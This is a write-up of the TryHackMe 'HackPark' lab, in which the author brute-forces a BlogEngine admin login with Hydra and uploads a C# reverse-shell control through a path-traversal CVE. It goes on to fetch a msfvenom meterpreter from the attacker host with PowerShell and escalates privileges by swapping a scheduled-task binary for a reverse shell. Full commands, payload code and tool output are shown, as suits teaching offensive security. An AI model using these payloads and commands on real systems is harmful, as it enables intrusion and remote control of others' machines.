---
title: "TryHackMe - HackPark Writeup"
summary: "Writeup of HackPark room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "web", "windows"]
showSummary: true
date: 2022-12-04
draft: false
---

## Introduction
Firstly, we look at the website and we need to find the name of the clown:

![0ce6fb360e7e4e431dc3ca84cda24d65.png](img/0ce6fb360e7e4e431dc3ca84cda24d65.png)

We do a reverse search with Google Lens:

![a4642157e5e89c272fce9ca7aab2faa0.png](img/a4642157e5e89c272fce9ca7aab2faa0.png)

And finally we found the name by a Google search:

![b7b1d7c1effbc6c4b7aa685062f23df0.png](img/b7b1d7c1effbc6c4b7aa685062f23df0.png)

##  Using Hydra to brute-force a login 
We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found [here](https://www.w3schools.com/tags/ref_httpmethods.asp)).

![97c5059856b3a6ee6cc90dc8377256c1.png](img/97c5059856b3a6ee6cc90dc8377256c1.png)

To brute-force the account, we use the following command:
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.205.192 http-form-post "/Account/login.aspx:__VIEWSTATE=8mNWGLxNXJN8wfx6vqdj3rA%2F9d8cpeKJeGtnFTrggQI9Lfjyem59RJwl%2Bfi%2BISDcD%2B48Izn57%2BYYVuNlU8bOVL6H8jDvgmeLNN7cCtEpTNYbdizgp2fKsK8sL6g11CXQBMiAQbrf6D6YP64UUsPWcOvTC0Ij01LUqTFOJep25yBOuz6Y&__EVENTVALIDATION=RXeSZ0l8L11pi%2BvuKnfkq0AZ%2FSUxOyZwaYvZhYX2jLG4KO%2BlgZ11MbioWOT0XHKEo7omClwwgQWjRk4YNbboj1HZSd3NRS6H1FBMH6ixhNJ4TTWtaGILDOvzVezBqBiGWh%2FLsmxWUa%2Bk0V6zwCmAYz%2Bk4l8WihTX2oknubZTyFR6jkfa&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
```

The `http-form-post` module allows us to bruteforce a login page, as you can see the parameters are separated by colons.

- The first parameter is the login page: `/Account/login.aspx`
- The second parameter is obtained by sending a request and viewing the request payload in raw mode:
![9b4435476cdd093f759ad79c02c5f404.png](img/9b4435476cdd093f759ad79c02c5f404.png)
We replaced the username and password values respectively with `^USER^` and `^PASS^` in order to allow Hydra to bruteforce these fields. To be more precise, Hydra won't bruteforce the username parameter because we specify that it's `admin`, but Hydra will bruteforce the password parameter with the wordlist.
- Finally, the last parameter is `Login failed`. It's the pattern that appears in an invalid login. It allows Hydra to know when the password tried is invalid.

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.205.192 http-form-post "/Account/login.aspx:__VIEWSTATE=8mNWGLxNXJN8wfx6vqdj3rA%2F9d8cpeKJeGtnFTrggQI9Lfjyem59RJwl%2Bfi%2BISDcD%2B48Izn57%2BYYVuNlU8bOVL6H8jDvgmeLNN7cCtEpTNYbdizgp2fKsK8sL6g11CXQBMiAQbrf6D6YP64UUsPWcOvTC0Ij01LUqTFOJep25yBOuz6Y&__EVENTVALIDATION=RXeSZ0l8L11pi%2BvuKnfkq0AZ%2FSUxOyZwaYvZhYX2jLG4KO%2BlgZ11MbioWOT0XHKEo7omClwwgQWjRk4YNbboj1HZSd3NRS6H1FBMH6ixhNJ4TTWtaGILDOvzVezBqBiGWh%2FLsmxWUa%2Bk0V6zwCmAYz%2Bk4l8WihTX2oknubZTyFR6jkfa&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-25 07:44:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.205.192:80/Account/login.aspx:__VIEWSTATE=8mNWGLxNXJN8wfx6vqdj3rA%2F9d8cpeKJeGtnFTrggQI9Lfjyem59RJwl%2Bfi%2BISDcD%2B48Izn57%2BYYVuNlU8bOVL6H8jDvgmeLNN7cCtEpTNYbdizgp2fKsK8sL6g11CXQBMiAQbrf6D6YP64UUsPWcOvTC0Ij01LUqTFOJep25yBOuz6Y&__EVENTVALIDATION=RXeSZ0l8L11pi%2BvuKnfkq0AZ%2FSUxOyZwaYvZhYX2jLG4KO%2BlgZ11MbioWOT0XHKEo7omClwwgQWjRk4YNbboj1HZSd3NRS6H1FBMH6ixhNJ4TTWtaGILDOvzVezBqBiGWh%2FLsmxWUa%2Bk0V6zwCmAYz%2Bk4l8WihTX2oknubZTyFR6jkfa&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.205.192   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-25 07:45:25
```

##  Compromise the machine 
Now you have logged into the website, are you able to identify the version of the BlogEngine?

We started by going on the admin panel and then we clicked on `About`:

![1aae383bf9cae9f3cce5aa53e63b43ad.png](img/1aae383bf9cae9f3cce5aa53e63b43ad.png)

So, we found the version of the BlogEngine and after searching on exploit-db we found a CVE:

![e8444c8357434a4935bab71fc7fe4c90.png](img/e8444c8357434a4935bab71fc7fe4c90.png)

The objective of this exploit is to craft a javascript payload that will be uploaded on the server. Then, we are going to use a Path traversal vulnerability leading to remote code execution. This is caused by an unchecked "theme" parameter that is used to override the default theme for rendering blog pages.

Firstly, here is the payload in which we changed the ip and port according to our network settings:
```js
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
        static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.11.5.152", 4445)) {
                using(System.IO.Stream stream = client.GetStream()) {
                        using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                                streamWriter = new System.IO.StreamWriter(stream);
                                                
                                StringBuilder strInput = new StringBuilder();

                                System.Diagnostics.Process p = new System.Diagnostics.Process();
                                p.StartInfo.FileName = "cmd.exe";
                                p.StartInfo.CreateNoWindow = true;
                                p.StartInfo.UseShellExecute = false;
                                p.StartInfo.RedirectStandardOutput = true;
                                p.StartInfo.RedirectStandardInput = true;
                                p.StartInfo.RedirectStandardError = true;
                                p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                                p.Start();
                                p.BeginOutputReadLine();

                                while(true) {
                                        strInput.Append(rdr.ReadLine());
                                        p.StandardInput.WriteLine(strInput);
                                        strInput.Remove(0, strInput.Length);
                                }
                        }
                }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
                try {
                        strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
```

Then we upload it with the name `PostView.ascx` at this path:
`http://10.10.205.192/admin/app/editor/editpost.cshtml`

![b813cd1eab7ab38a3334041a75709372.png](img/b813cd1eab7ab38a3334041a75709372.png)

Once it's done, we juste need to load the theme with the path traversal vulnerability by making a request here `http://10.10.205.192/?theme=../../App_Data/files`

Bingo ! We have a shell:
```bash
nc -lvp 4445          
listening on [any] 4445 ...
10.10.205.192: inverse host lookup failed: Unknown host
connect to [10.11.5.152] from (UNKNOWN) [10.10.205.192] 49285
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
```

## Windows Privilege Escalation 
Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

Firstly, we start a listner with `metasploit`:
```bash
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 10.11.5.152
LHOST => 10.11.5.152
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) > run
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here

[*] Started reverse TCP handler on 10.11.5.152:4443 
[-] Command shell session 1 is not valid and will be closed
[*] 10.10.205.192 - Command shell session 1 closed.

^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.5.152:4443
```

Then, we generate a meterpreter with `msfvenom`:
```bash
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.5.152 LPORT=4443 -f exe -o meterpreter.exe
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: meterpreter.exe
```

Let's start a simple http server with `python3 -m http.server 80` and download it on the server. 

Firstly, we go on the `Temp` directory because he is writeable. And we download the meterpreter with `powershell -c wget "http://10.11.5.152/meterpreter.exe" -outfile "meterpreter.exe"`.
```powershell
c:\Users>cd C:\Windows\Temp
dir
C:\Windows\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Windows\Temp
10/24/2022  11:55 PM    <DIR>          .
10/24/2022  11:55 PM    <DIR>          ..
08/06/2019  02:13 PM             8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019  02:13 PM           181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019  02:13 PM             1,206 cleanup.txt
08/06/2019  02:13 PM               421 cmdout
08/06/2019  02:11 PM                 0 DMI2EBC.tmp
08/03/2019  10:43 AM                 0 DMI4D21.tmp
08/06/2019  02:12 PM             8,743 EC2ConfigService_20190806141221.log
08/06/2019  02:12 PM           292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
08/06/2019  02:13 PM                21 stage1-complete.txt
08/06/2019  02:13 PM            28,495 stage1.txt
05/12/2019  09:03 PM           113,328 svcexec.exe
08/06/2019  02:13 PM                67 tmp.dat
              12 File(s)        634,982 bytes
               2 Dir(s)  39,121,575,936 bytes free
powershell -c wget "http://10.11.5.152/meterpreter.exe" -outfile "meterpreter.exe"
C:\Windows\Temp>powershell -c wget "http://10.11.5.152/meterpreter.exe" -outfile "meterpreter.exe"

C:\Windows\Temp>
dir
C:\Windows\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Windows\Temp
10/25/2022  12:06 AM    <DIR>          .
10/25/2022  12:06 AM    <DIR>          ..
08/06/2019  02:13 PM             8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019  02:13 PM           181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019  02:13 PM             1,206 cleanup.txt
08/06/2019  02:13 PM               421 cmdout
08/06/2019  02:11 PM                 0 DMI2EBC.tmp
08/03/2019  10:43 AM                 0 DMI4D21.tmp
08/06/2019  02:12 PM             8,743 EC2ConfigService_20190806141221.log
08/06/2019  02:12 PM           292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
10/25/2022  12:06 AM            73,802 meterpreter.exe
10/25/2022  12:06 AM    <DIR>          Microsoft
08/06/2019  02:13 PM                21 stage1-complete.txt
08/06/2019  02:13 PM            28,495 stage1.txt
05/12/2019  09:03 PM           113,328 svcexec.exe
08/06/2019  02:13 PM                67 tmp.dat
              13 File(s)        708,784 bytes
               3 Dir(s)  39,120,265,216 bytes free
Start-Process meterpreter.exe
C:\Windows\Temp>
meterpreter.exe
```

Now, we have a new shell:
```bash
[*] Sending stage (175686 bytes) to 10.10.205.192
[*] Meterpreter session 2 opened (10.11.5.152:4443 -> 10.10.205.192:49337) at 2022-10-25 09:08:32 +0200

meterpreter > sysinfo
Computer        : HACKPARK
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```

Let's further enumerate the machine:
```bash
meterpreter > shell
Process 2276 created.
Channel 2 created.

WinPMicrosoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
ea
C:\Windows\Temp>WinPEAS.exe services info
```

As you can see, there is a service running with too high permissions:

![270d74f3d84c8979fde0345674fac5c5.png](img/270d74f3d84c8979fde0345674fac5c5.png)

And the binary concerned by this vulnerability is `WService.exe`. However, for some reason that's not the correct answer. We have to go on the `Program Files` folder and inspect it.

```powershell
c:\>cd Program Files (x86)
cd Program Files (x86)

c:\Program Files (x86)>dir      
dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552

 Directory of c:\Program Files (x86)

08/06/2019  02:12 PM    <DIR>          .
08/06/2019  02:12 PM    <DIR>          ..
08/22/2013  08:39 AM    <DIR>          Common Files
03/21/2014  12:07 PM    <DIR>          Internet Explorer
08/22/2013  08:39 AM    <DIR>          Microsoft.NET
08/04/2019  04:37 AM    <DIR>          SystemScheduler
08/22/2013  08:39 AM    <DIR>          Windows Mail
08/22/2013  08:39 AM    <DIR>          Windows NT
08/22/2013  08:39 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
               9 Dir(s)  39,122,321,408 bytes free

c:\Program Files (x86)>cd SystemScheduler
cd SystemScheduler

c:\Program Files (x86)\SystemScheduler>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552

 Directory of c:\Program Files (x86)\SystemScheduler

08/04/2019  04:37 AM    <DIR>          .
08/04/2019  04:37 AM    <DIR>          ..
05/17/2007  01:47 PM             1,150 alarmclock.ico
08/31/2003  12:06 PM               766 clock.ico
08/31/2003  12:06 PM            80,856 ding.wav
10/25/2022  12:38 AM    <DIR>          Events
08/04/2019  04:36 AM                60 Forum.url
01/08/2009  08:21 PM         1,637,972 libeay32.dll
11/16/2004  12:16 AM             9,813 License.txt
10/25/2022  12:32 AM             1,496 LogFile.txt
10/25/2022  12:32 AM             3,760 LogfileAdvanced.txt
03/25/2018  10:58 AM           536,992 Message.exe
03/25/2018  10:59 AM           445,344 PlaySound.exe
03/25/2018  10:58 AM            27,040 PlayWAV.exe
08/04/2019  03:05 PM               149 Preferences.ini
03/25/2018  10:58 AM           485,792 Privilege.exe
03/24/2018  12:09 PM            10,100 ReadMe.txt
03/25/2018  10:58 AM           112,544 RunNow.exe
03/25/2018  10:59 AM            40,352 sc32.exe
08/31/2003  12:06 PM               766 schedule.ico
03/25/2018  10:58 AM         1,633,696 Scheduler.exe
03/25/2018  10:59 AM           491,936 SendKeysHelper.exe
03/25/2018  10:58 AM           437,664 ShowXY.exe
03/25/2018  10:58 AM           439,712 ShutdownGUI.exe
03/25/2018  10:58 AM           235,936 SSAdmin.exe
03/25/2018  10:58 AM           731,552 SSCmd.exe
01/08/2009  08:12 PM           355,446 ssleay32.dll
03/25/2018  10:58 AM           456,608 SSMail.exe
08/04/2019  04:36 AM             6,999 unins000.dat
08/04/2019  04:36 AM           722,597 unins000.exe
08/04/2019  04:36 AM                54 Website.url
06/26/2009  05:27 PM             6,574 whiteclock.ico
03/25/2018  10:58 AM            76,704 WhoAmI.exe
05/16/2006  04:49 PM           785,042 WSCHEDULER.CHM
05/16/2006  03:58 PM             2,026 WScheduler.cnt
03/25/2018  10:58 AM           331,168 WScheduler.exe
05/16/2006  04:58 PM           703,081 WSCHEDULER.HLP
03/25/2018  10:58 AM           136,096 WSCtrl.exe
03/25/2018  10:58 AM            98,720 WService.exe
03/25/2018  10:58 AM            68,512 WSLogon.exe
03/25/2018  10:59 AM            33,184 WSProc.dll
              38 File(s)     11,148,259 bytes
               3 Dir(s)  39,122,321,408 bytes free

c:\Program Files (x86)\SystemScheduler>dir Events
dir Events
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552

 Directory of c:\Program Files (x86)\SystemScheduler\Events

10/25/2022  12:38 AM    <DIR>          .
10/25/2022  12:38 AM    <DIR>          ..
10/25/2022  12:39 AM             1,926 20198415519.INI
10/25/2022  12:39 AM            18,687 20198415519.INI_LOG.txt
10/02/2020  02:50 PM               290 2020102145012.INI
10/25/2022  12:32 AM               186 Administrator.flg
10/25/2022  12:32 AM                 0 Scheduler.flg
10/25/2022  12:32 AM                 0 service.flg
10/25/2022  12:32 AM               449 SessionInfo.flg
10/25/2022  12:32 AM               182 SYSTEM_svc.flg
               8 File(s)         21,720 bytes
               2 Dir(s)  39,122,321,408 bytes free
```

In the `Program Files` folder, there is another folder named `Events`wich contained a log file:
```powershell
c:\Program Files (x86)\SystemScheduler\Events>more 20198415519.INI_LOG.txt
more 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
```

It reveals that's the process executed is `Message.exe`.

So let's exploit it by generating a new reverse-shell and replace `Message.exe` with it:
```bash
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.5.152 LPORT=4442 -f exe -o meterpreter2.exe
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: meterpreter2.exe
```

Now let's upload it:
```bash
meterpreter > upload "Workspace/tryhackme/hackpark/meterpreter2.exe" "C:\Program Files (x86)\SystemScheduler\Message.exe"
[*] uploading  : /home/parallels/Workspace/tryhackme/hackpark/meterpreter2.exe -> C:\Program Files (x86)\SystemScheduler\Message.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/parallels/Workspace/tryhackme/hackpark/meterpreter2.exe -> C:\Program Files (x86)\SystemScheduler\Message.exe
[*] uploaded   : /home/parallels/Workspace/tryhackme/hackpark/meterpreter2.exe -> C:\Program Files (x86)\SystemScheduler\Message.exe
```

Finally, we create a listener with metasploit and after a few minutes the `WindowsScheduler` has run our reverse-shell:
```bash
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.11.5.152
LHOST => 10.11.5.152
msf6 exploit(multi/handler) > set LPORT 4442
LPORT => 4442
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.5.152:4442 
[*] Sending stage (175686 bytes) to 10.10.33.59
[*] Meterpreter session 1 opened (10.11.5.152:4442 -> 10.10.33.59:49241) at 2022-10-25 09:53:02 +0200
meterpreter > cd "C:\\Users\\jeff\\"
meterpreter > ls
Listing: C:\Users\jeff
======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  AppData
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Application Data
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Contacts
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Cookies
040555/r-xr-xr-x  0       dir   2019-08-04 20:55:14 +0200  Desktop
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Documents
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Downloads
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Favorites
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Links
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  Local Settings
040555/r-xr-xr-x  0       dir   2019-08-04 20:54:53 +0200  Music
040777/rwxrwxrwx  0       dir   2019-08-04 20:54:52 +0200  My Documents
100666/rw-rw-rw-  524288  fil   2022-10-25 09:42:47 +0200  NTUSER.DAT
